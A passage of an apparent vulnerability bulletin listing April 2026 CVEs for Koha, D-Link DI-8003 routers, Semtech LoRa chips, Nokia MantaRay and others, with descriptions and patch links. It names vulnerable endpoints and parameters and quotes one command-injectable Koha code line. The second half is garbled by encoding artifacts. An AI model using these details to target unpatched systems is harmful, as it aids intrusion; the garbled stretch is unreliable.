      Patch Info: https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-m82x-prv3-rwwv https://github.com/chamilo/chamilo-lms/commit/73ae6293adaa6098374bc22625342dbae5cbc446

    n/a--Stakeholder-Specific Vulnerability Categorization (SSVC)
      Description: QD 20230821 is vulnerable to Server-side request forgery (SSRF) via a crafted request.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2023-46945 [ https://www.cve.org/CVERecord?id=CVE-2023-46945 ]
      Patch Info: https://qd-today.github.io/qd/ https://gist.github.com/kurokoleung/5b36b2013a54adadcce79967d3e4f056

    n/a--Koha 23.05.10
      Description: Koha Library before 23.05.10 fails to sanitize user-controllable filenames prior to unzipping, leading to remote code execution. The line "qx/unzip $filename -d $dirname/;" in upload-cover-image.pl is vulnerable to command injection via shell metacharacters because input data can be controlled by an attacker and is directly included in a system command, i.e., an attack can occur via malicious filenames after uploading a .zip file and clicking Process Images.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2024-36057 [ https://www.cve.org/CVERecord?id=CVE-2024-36057 ]
      Patch Info: https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md https://github.com/hacklantic/Research/tree/main/CVE-2024-36057 https://koha-community.org/koha-22-05-22-released/

    n/a--Koha 23.05.10
      Description: The Send Basket functionality in Koha Library before 23.05.10 is susceptible to Time-Based SQL Injection because it fails to sanitize the POST parameter bib_list in /cgi-bin/koha/opac-sendbasket.pl, allowing library users to read arbitrary data from the database.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2024-36058 [ https://www.cve.org/CVERecord?id=CVE-2024-36058 ]
      Patch Info: https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md https://koha-community.org/koha-22-05-22-released/ https://github.com/hacklantic/Research/tree/main/CVE-2024-36058

    Unknown--YML for Yandex Market
      Description: The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process.
      Published: 2026-04-10 | CVSS Score: not yet calculated
      Source Info: CVE-2025-14545 [ https://www.cve.org/CVERecord?id=CVE-2025-14545 ]
      Patch Info: https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/

    Canonical--Ubuntu
      Description: In Ubuntu, Subiquity version 24.04.4 could leak sensitive user credentials during crash reporting. Upon installation failure, if a user submitted a bug report to Launchpad, Subiquity could include certain user credentials, such as the user's plaintext Wi-Fi password, in the attached logs.
      Published: 2026-04-09 | CVSS Score: not yet calculated
      Source Info: CVE-2025-14551 [ https://www.cve.org/CVERecord?id=CVE-2025-14551 ]
      Patch Info: noble backport - stop logging network config and identity data [ https://github.com/canonical/subiquity/pull/2358 ] Stop logging identity data and network secrets [ https://github.com/canonical/subiquity/pull/2357 ]

    Mitsubishi Electric Corporation--GENESIS64
      Description: Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GENESIS64, ICONICS Suite, MobileHMI, Hyper Historian and AnalytiX versions 10.97.3 and prior, GENESIS versions 11.02 and prior, and MC Works64 all versions (GENESIS64, ICONICS Suite, MobileHMI, Hyper Historian, AnalytiX and GENESIS are affected at the same versions under the Mitsubishi Electric Iconics Digital Solutions product name) allows a local attacker to disclose the SQL Server credentials stored in plaintext within the local SQLite file, when the local caching feature using SQLite is enabled and SQL authentication is used for the SQL Server authentication. As a result, the unauthorized attacker could access the SQL Server and disclose, tamper with, or destroy data on the server, potentially causing a denial-of-service (DoS) condition on the system.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-14815 [ https://www.cve.org/CVERecord?id=CVE-2025-14815 ]
      Patch Info: https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf https://jvn.jp/vu/JVNVU90646130/ https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01

    Mitsubishi Electric Corporation--GENESIS64
      Description: Cleartext Storage of Sensitive Information in GUI vulnerability in Mitsubishi Electric GENESIS64, ICONICS Suite, MobileHMI, Hyper Historian and AnalytiX versions 10.97.3 and prior, GENESIS versions 11.02 and prior, and MC Works64 all versions (GENESIS64, ICONICS Suite, MobileHMI, Hyper Historian, AnalytiX and GENESIS are affected at the same versions under the Mitsubishi Electric Iconics Digital Solutions product name) allows a local attacker to disclose the SQL Server credentials displayed in plain text in the GUI of the Hyper Historian Splitter feature, when SQL authentication is used for the SQL Server authentication. As a result, the unauthorized attacker could access the SQL Server and disclose, tamper with, or destroy data on the server, potentially causing a denial-of-service (DoS) condition on the system.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-14816 [ https://www.cve.org/CVERecord?id=CVE-2025-14816 ]
      Patch Info: https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01 https://jvn.jp/vu/JVNVU90646130/
    Semtech--LR1110
      Description: An improper access control vulnerability exists in Semtech LoRa LR11xxx transceivers running early versions of firmware where the memory write command accessible via the physical SPI interface fails to enforce write protection on the program call stack. An attacker with physical access to the SPI interface can overwrite stack memory to hijack program control flow and achieve limited arbitrary code execution. However, the impact is limited to the active attack session: the device's secure boot mechanism prevents persistent firmware modification, the crypto engine isolates cryptographic keys from direct firmware access, and all modifications are lost upon device reboot or loss of physical access.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2025-14857 [ https://www.cve.org/CVERecord?id=CVE-2025-14857 ]
      Patch Info: https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001

    Semtech--LR1110
      Description: The Semtech LR11xx LoRa transceivers running early versions of firmware contain an information disclosure vulnerability in their firmware validation functionality. When a host issues a firmware validity check command via the SPI interface, the device decrypts the provided encrypted firmware package block-by-block to validate its integrity. However, the last decrypted firmware block remains uncleared in memory after the validation process completes. An attacker with access to the SPI interface can subsequently issue memory read commands to retrieve the decrypted firmware contents from this residual memory, effectively bypassing the firmware encryption protection mechanism. The attack requires physical access to the device's SPI interface.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2025-14858 [ https://www.cve.org/CVERecord?id=CVE-2025-14858 ]
      Patch Info: https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001

    Semtech--LR1110
      Description: The Semtech LR11xx LoRa transceivers implement secure boot functionality using digital signatures to authenticate firmware. However, the implementation uses a non-standard cryptographic hashing algorithm that is vulnerable to second preimage attacks. An attacker with physical access to the device can exploit this weakness to generate a malicious firmware image with a hash collision, bypassing the secure boot verification mechanism and installing arbitrary unauthorized firmware on the device.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2025-14859 [ https://www.cve.org/CVERecord?id=CVE-2025-14859 ]
      Patch Info: https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001

    Canonical--Ubuntu
      Description: In Ubuntu, ubuntu-desktop-provision version 24.04.4 could leak sensitive user credentials during crash reporting. Upon installation failure, if a user submitted a bug report to Launchpad, ubuntu-desktop-provision could include the user's password hash in the attached logs.
      Published: 2026-04-09 | CVSS Score: not yet calculated
      Source Info: CVE-2025-15480 [ https://www.cve.org/CVERecord?id=CVE-2025-15480 ]
      Patch Info: feat: don't log identity data (noble backport) [ https://github.com/canonical/ubuntu-desktop-provision/pull/1400 ] feat: don't log identity data [ https://github.com/canonical/ubuntu-desktop-provision/pull/1399 ]

    Unknown--Popup Box
      Description: The Popup Box WordPress plugin before 5.5.0 does not properly validate nonces in the add_or_edit_popupbox() function before saving popup data, allowing unauthenticated attackers to perform Cross-Site Request Forgery attacks. When an authenticated admin visits a malicious page, the attacker can create or modify popups with arbitrary JavaScript that executes in the admin panel and frontend.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2025-15611 [ https://www.cve.org/CVERecord?id=CVE-2025-15611 ]
      Patch Info: https://wpscan.com/vulnerability/089ea763-2421-4089-a220-251421f7f226/

    Ping Identity--PingIDM
      Description: An insufficient granularity of access control vulnerability exists in PingIDM (formerly ForgeRock Identity Management) where administrators cannot properly configure access rules for Remote Connector Servers (RCS) running in client mode. This means attackers can spoof a client-mode RCS (if one exists) to intercept and/or modify an identity's security-relevant properties, such as passwords and account recovery information. This issue is exploitable only when an RCS is configured to run in client mode.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2025-20628 [ https://www.cve.org/CVERecord?id=CVE-2025-20628 ]
      Patch Info: https://backstage.forgerock.com/knowledge/advisories/article/a14305629?rev=_newest https://backstage.pingidentity.com/downloads/browse/idm/featured

    Nokia--MantaRay NM
      Description: Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in the Symptom Collector application.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2025-24817 [ https://www.cve.org/CVERecord?id=CVE-2025-24817 ]
      Patch Info: https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24817/

    Nokia--MantaRay NM
      Description: Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in the Log Search application.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2025-24818 [ https://www.cve.org/CVERecord?id=CVE-2025-24818 ]
      Patch Info: https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24818/

    Nokia--MantaRay NM
      Description: Nokia MantaRay NM is vulnerable to a Relative Path Traversal vulnerability due to improper validation of an input parameter on the file system in the Software Manager application.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2025-24819 [ https://www.cve.org/CVERecord?id=CVE-2025-24819 ]
      Patch Info: https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24819/

    Checkmk GmbH--Checkmk
      Description: Local privilege escalation in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows a site user to escalate their privileges to root by manipulating files in the site context that are processed when the `omd` administrative command is run by root.
      Published: 2026-04-07 | CVSS Score: not yet calculated
      Source Info: CVE-2025-39666 [ https://www.cve.org/CVERecord?id=CVE-2025-39666 ]
      Patch Info: https://checkmk.com/werk/18891

    n/a--OwnTone - open source (audio) media server
      Description: owntone-server 2ca10d9 is vulnerable to Buffer Overflow due to lack of recursive checking.
      Published: 2026-04-10 | CVSS Score: not yet calculated
      Source Info: CVE-2025-44560 [ https://www.cve.org/CVERecord?id=CVE-2025-44560 ]
      Patch Info: https://github.com/owntone/owntone-server/issues/1873 https://gist.github.com/wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3

    D-Link[.]com -- D-Link DI-8300
      Description: D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the ip parameter in the ip_position_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-45057 [ https://www.cve.org/CVERecord?id=CVE-2025-45057 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8300
      Description: D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the fx parameter in the jingx_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-45058 [ https://www.cve.org/CVERecord?id=CVE-2025-45058 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8300
      Description: D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the fn parameter in the tgfile_htm function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-45059 [ https://www.cve.org/CVERecord?id=CVE-2025-45059 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    www[.]rrweb[.]io/ -- rrwebplayer
      Description: A cross-site scripting (XSS) vulnerability in rrweb-snapshot before v2.0.0-alpha.18 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
      Published: 2026-04-09 | CVSS Score: not yet calculated
      Source Info: CVE-2025-45806 [ https://www.cve.org/CVERecord?id=CVE-2025-45806 ]
      Patch Info: https://github.com/rrweb-io/rrweb https://github.com/rrweb-io/rrweb/tree/master/packages/rrweb-snapshot https://github.com/rrweb-io/rrweb/issues/1817

    Google--Android
      Description: In importWrappedKey of KMKeymasterApplet.java, there is a possible way to access keys that should be restricted due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
      Published: 2026-04-06 | CVSS Score: not yet calculated
      Source Info: CVE-2025-48651 [ https://www.cve.org/CVERecord?id=CVE-2025-48651 ]
      Patch Info: https://source.android.com/docs/security/bulletin/2026/2026-04-01

    n/a--n/a
      Description: Jizhicms v2.5.4 is vulnerable to Server-Side Request Forgery (SSRF) in the User Evaluation, Message, and Comment modules.
      Published: 2026-04-09 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50228 [ https://www.cve.org/CVERecord?id=CVE-2025-50228 ]
      Patch Info: https://github.com/Cherry-toto/jizhicms https://www.jizhicms.cn https://github.com/Cherry-toto/jizhicms/issues/104

    D-Link[.]com -- D-Link DI-8003
      Description: A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper validation of user input in the qj.asp endpoint.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50644 [ https://www.cve.org/CVERecord?id=CVE-2025-50644 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: A vulnerability has been discovered in D-Link DI-8003 16.07.26A1, which can lead to a buffer overflow when the s parameter in the pppoe_list_opt.asp endpoint is manipulated. By sending a crafted request with an excessively large value for the s parameter, an attacker can trigger a buffer overflow condition.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50645 [ https://www.cve.org/CVERecord?id=CVE-2025-50645 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to insufficient input validation on the name parameter in the /qos_type_asp.asp endpoint.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50646 [ https://www.cve.org/CVERecord?id=CVE-2025-50646 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1, specifically in the handling of the wans parameter in the qos.asp endpoint.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50647 [ https://www.cve.org/CVERecord?id=CVE-2025-50647 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to inadequate input validation in the /tggl.asp endpoint.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50648 [ https://www.cve.org/CVERecord?id=CVE-2025-50648 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper input validation in the vlan_name parameter in the /shut_set.asp endpoint.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50649 [ https://www.cve.org/CVERecord?id=CVE-2025-50649 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to inadequate validation of input size in the routes_static parameter in the /router.asp endpoint.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50650 [ https://www.cve.org/CVERecord?id=CVE-2025-50650 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: An issue in D-Link DI-8003 16.07.26A1 relates to improper handling of the id parameter in the /saveparm_usb.asp endpoint.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50652 [ https://www.cve.org/CVERecord?id=CVE-2025-50652 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name and mem parameters in the /time_group.asp endpoint.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50653 [ https://www.cve.org/CVERecord?id=CVE-2025-50653 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper validation of the id parameter in the /thd_member.asp endpoint.
      Published: 2026-04-08 | CVSS Score: not yet calculated
      Source Info: CVE-2025-50654 [ https://www.cve.org/CVERecord?id=CVE-2025-50654 ]
      Patch Info: https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md

    D-Link[.]com -- D-Link DI-8003
      Description: A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of the name paramet=
    er in the /thd_group.asp endpoint. 2026-04-08 not yet calculated CVE-2025-5= 0655 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50655 ] https://www.dlin= k.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of the pid paramete=
    r in the /trace.asp endpoint. 2026-04-08 not yet calculated CVE-2025-50657 =
    [ https://www.cve.org/CVERecord?id=3DCVE-2025-50657 ] https://www.dlink.com= /en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of the custom_error=
    parameter in the /user.asp endpoint. 2026-04-08 not yet calculated CVE-202= 5-50659 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50659 ] https://www.d= link.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of the name paramet=
    er in the /url_member.asp endpoint. 2026-04-08 not yet calculated CVE-2025-= 50660 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50660 ] https://www.dli= nk.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of multiple paramet= ers in the /url_rule.asp endpoint. An attacker can exploit this vulnerabili=
    ty by sending a crafted HTTP GET request with parameters name, en, ips, u, = time, act, rpri, and log. 2026-04-08 not yet calculated CVE-2025-50661 [ ht= tps://www.cve.org/CVERecord?id=3DCVE-2025-50661 ] https://www.dlink.com/en/= security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of the name paramet=
    er in the /url_group.asp endpoint. 2026-04-08 not yet calculated CVE-2025-5= 0662 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50662 ] https://www.dlin= k.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of the name paramet=
    er in the /usb_paswd.asp endpoint. 2026-04-08 not yet calculated CVE-2025-5= 0663 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50663 ] https://www.dlin= k.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in th=
    e /user_group.asp endpoint. The attacker can exploit this vulnerability by = sending a crafted HTTP GET request with parameters name, mem, pri, and attr=
    . 2026-04-08 not yet calculated CVE-2025-50664 [ https://www.cve.org/CVERec= ord?id=3DCVE-2025-50664 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of input parameters=
    in the /web_keyword.asp endpoint. An attacker can exploit this vulnerabili=
    ty by sending a crafted HTTP GET request via the name, en, time, mem_gb2312=
    , and mem_utf8 parameters. 2026-04-08 not yet calculated CVE-2025-50665 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2025-50665 ] https://www.dlink.com/en= /security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of multiple paramet= ers in the /web_post.asp endpoint. An attacker can exploit this vulnerabili=
    ty by sending a crafted HTTP GET request in parameters such as name, en, us= er_id, log, and time. 2026-04-08 not yet calculated CVE-2025-50666 [ https:= //www.cve.org/CVERecord?id=3DCVE-2025-50666 ] https://www.dlink.com/en/secu= rity-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of the iface parame= ter in the /wan_line_detection.asp endpoint. 2026-04-08 not yet calculated = CVE-2025-50667 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50667 ] https:= //www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of the s parameter =
    in the /web_list_opt.asp endpoint. 2026-04-08 not yet calculated CVE-2025-5= 0668 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50668 ] https://www.dlin= k.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 and DI-8003G 19.12.10A1 due to improper hand= ling of the wan_ping parameter in the /wan_ping.asp endpoint. 2026-04-08 no=
    t yet calculated CVE-2025-50669 [ https://www.cve.org/CVERecord?id=3DCVE-20= 25-50669 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in th=
    e /xwgl_bwr.asp endpoint. An attacker can exploit this vulnerability by sen= ding a crafted HTTP GET request in the name, qq, and time parameters. 2026-= 04-08 not yet calculated CVE-2025-50670 [ https://www.cve.org/CVERecord?id= =3DCVE-2025-50670 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in th=
    e /xwgl_ref.asp endpoint. An attacker can exploit this vulnerability by sen= ding a crafted HTTP GET request with excessively long strings in parameters=
    name, en, user_id, shibie_name, time, act, log, and rpri. 2026-04-08 not y=
    et calculated CVE-2025-50671 [ https://www.cve.org/CVERecord?id=3DCVE-2025-= 50671 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in th=
    e /yyxz_dlink.asp endpoint. 2026-04-08 not yet calculated CVE-2025-50672 [ = https://www.cve.org/CVERecord?id=3DCVE-2025-50672 ] https://www.dlink.com/e= n/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
    s in D-Link DI-8003 16.07.26A1 due to improper handling of the http_lanport=
    parameter in the /webgl.asp endpoint. 2026-04-08 not yet calculated CVE-20= 25-50673 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50673 ] https://www.= dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 Tendacn[.]com -- AC6 WiFi Router Tenda AC6 15.03.05.16_multi is vuln= erable to Buffer Overflow in the formSetCfm function via the funcname, func= para1, and funcpara2 parameters. 2026-04-08 not yet calculated CVE-2025-522=
    21 [ https://www.cve.org/CVERecord?id=3DCVE-2025-52221 ] https://github.com= /faqiadegege/IoTVuln/blob/main/tendaAc6_formSetCfm_funcname_overflow/detail= .md
    https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003=C2=A0 D-Link DI-8003 v16.07.26A1, DI-= 8500 v16.07.26A1; DI-8003G v17.12.21A1, DI-8200G v17.12.20A1, DI-8200 v16.0= 7.26A1, DI-8400 v16.07.26A1, DI-8004w v16.07.26A1, DI-8100 v16.07.26A1, and=
    DI-8100G v17.12.20A1 were discovered to contain a buffer overflow via the = rd_en, rd_auth, rd_acct, http_hadmin, http_hadminpwd, rd_key, and rd_ip par= ameters in the radius_asp function. This vulnerability allows attackers to = cause a Denial of Service (DoS) via a crafted request. 2026-04-08 not yet c= alculated CVE-2025-52222 [ https://www.cve.org/CVERecord?id=3DCVE-2025-5222=
    2 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in the Wi-Fi driver in Samsung Mobile Pro= cessor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580=
    , W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command l= eads to a buffer overflow via a certain ioctl message, issue 1 of 2. 2026-0= 4-07 not yet calculated CVE-2025-52908 [ https://www.cve.org/CVERecord?id= =3DCVE-2025-52908 ] https://semiconductor.samsung.com/support/quality-suppo= rt/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-52908/
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in the Wi-Fi driver in Samsung Mobile Pro= cessor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580=
    , W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command l= eads to a buffer overflow via a certain ioctl message, issue 2 of 2. 2026-0= 4-07 not yet calculated CVE-2025-52909 [ https://www.cve.org/CVERecord?id= =3DCVE-2025-52909 ] https://semiconductor.samsung.com/support/quality-suppo= rt/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-52909/
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in NAS in Samsung Mobile Processor, Weara= ble Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330=
    , 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem = 5300, and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads=
    to a Denial of Service. 2026-04-06 not yet calculated CVE-2025-54324 [ htt= ps://www.cve.org/CVERecord?id=3DCVE-2025-54324 ] https://semiconductor.sams= ung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54324/
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in SMS in Samsung Mobile Processor, Weara= ble Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330=
    , 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem = 5300, and Modem 5400. A Stack-based Buffer Overflow occurs while parsing SM=
